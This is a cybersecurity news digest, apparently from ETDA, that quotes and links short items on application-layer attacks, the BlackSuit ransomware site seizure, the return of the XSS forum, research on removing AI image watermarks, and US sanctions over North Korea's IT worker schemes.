"Application-layer attacks have become one of the most common and consequential methods adversaries use to gain access and compromise organizations, according to Contrast Security. These attacks target the custom code, APIs, and logic that power applications, often slipping past detection tools such as Endpoint Detection and Response (EDR) and network-based defenses such as Web Application Firewalls (WAFs)."
https://www.helpnetsecurity.com/2025/07/24/adversaries-application-layer-attacks/
- BlackSuit Ransomware Extortion Sites Seized In Operation Checkmate
"Law enforcement has seized the dark web extortion sites of the BlackSuit ransomware operation, which has targeted and breached the networks of hundreds of organizations worldwide over the past several years. The U.S. Department of Justice confirmed the takedown in an email earlier today, saying the authorities involved in the action executed a court-authorized seizure of the BlackSuit domains. Earlier today, the websites on the BlackSuit .onion domains were replaced with seizure banners announcing that the ransomware gang's sites were taken down by the U.S. Homeland Security Investigations federal law enforcement agency as part of a joint international action codenamed Operation Checkmate."
https://www.bleepingcomputer.com/news/security/law-enforcement-seizes-blacksuit-ransomware-leak-sites/
- Translating Cyber-Risk For The Boardroom
"Cybersecurity is no longer just a technical problem in today's fast-evolving threat landscape, where cyberattacks are growing more frequent, sophisticated, and publicly damaging. Instead, it's an issue that demands enterprisewide alignment. Yet, many chief information security officers (CISOs) still find themselves speaking a technical language that fails to resonate with other leaders. Technical terms often fall flat in boardrooms more concerned with revenue growth and brand reputation. This disconnect is becoming increasingly risky as cyber incidents now directly affect stock prices, customer trust, and executive job security."
https://www.darkreading.com/cyber-risk/translating-cyber-risk-boardroom
- What Makes Great Threat Intelligence?
"Fast-changing geopolitics is constantly altering the nature of threats, so CISOs must quickly adapt their approach to new risks and sources of intelligence. While the need for high-quality threat intelligence is undeniable, it is a discipline that can sprawl uncontrollably. It also requires a targeted response. Industry analysts at Frost & Sullivan calculated that organizations spent a weighty $1.6 billion on threat intelligence and threat intelligence platforms globally in 2023, and forecast that this figure will increase by a compound annual growth rate of 32.8% until 2028."
https://www.darkreading.com/threat-intelligence/what-makes-great-threat-intelligence
- Cybercrime Forum XSS Returns On Mirror And Dark Web 1 Day After Seizure
"On July 23, 2025, as reported by Hackread.com, the cybercrime community lost one of its oldest and most notorious forums, XSS, after law enforcement authorities seized the site and arrested its suspected administrator in Ukraine. The arrest led to the seizure of the forum’s main domain, XSS.IS, which now displays a notice from Europol, French and Ukrainian authorities. However, the forum’s dark web (.onion) and mirror domains did not show a seizure notice but instead returned a 504 Gateway Timeout error. As of July 24, Hackread.com can confirm that the XSS forum is back online via both its mirror and .onion domains. While it is unclear whether this is a honeypot set up by authorities, one of the forum’s administrators has posted claiming the infrastructure was not affected by the seizure and that a replacement is in progress."
https://hackread.com/cybercrime-forum-xss-returns-mirror-dark-web-seizure/
- AI-Generated Image Watermarks Can Be Easily Removed, Say Researchers
"Now that AI can make fake images that look real, how can we know what’s legitimate and what isn’t? One of the primary ways has been the use of defensive watermarking, which means embedding invisible markers in AI-generated images to show they were made up. Now, researchers have broken that technology. Generative AI isn’t just for writing emails or suggesting recipes. It can generate entire images from scratch. While most people use that for fun (making cartoons of your dog) or practicality (envisioning a woodworking project, say) some use it irresponsibly. One example is creating images that look like real creators’ content (producing an image ‘in the style of’ a particular artist)."
https://www.malwarebytes.com/blog/news/2025/07/ai-generated-image-watermarks-can-be-easily-removed-say-researchers
https://github.com/andrekassis/ai-watermark
https://www.theregister.com/2025/07/24/ai_watermarks_unmarker/
- Email Threat Radar – July 2025
"During July, Barracuda threat analysts identified several notable email-based threats targeting organizations around the world. Many of them leveraged popular phishing-as-a-service (PhaaS) kits."
https://blog.barracuda.com/2025/07/24/email-threat-radar-july-2025
- US Hits Senior North Korean Officials With Sanctions, $3 Million Bounties
"Three senior North Korean officials involved in IT schemes have been sanctioned by the U.S. Treasury Department. Kim Se Un, Jo Kyong Hun and Myong Chol Min are accused of helping North Korea evade U.S. and United Nations sanctions through an IT worker plot that involved tricking companies into hiring North Koreans using stolen identities. U.S. law enforcement action centered on Korea Sobaeksu Trading Company — a North Korean company allegedly used as a front for the country’s Munitions Industry Department, which oversees the DPRK’s nuclear program and is involved in the development of ballistic missiles."
https://therecord.media/us-sanctions-north-korean-officers-it-worker-scheme
https://www.theregister.com/2025/07/24/laptop_farmer_north_korean_it_scam_sentenced/
Reference
Electronic Transactions Development Agency (ETDA)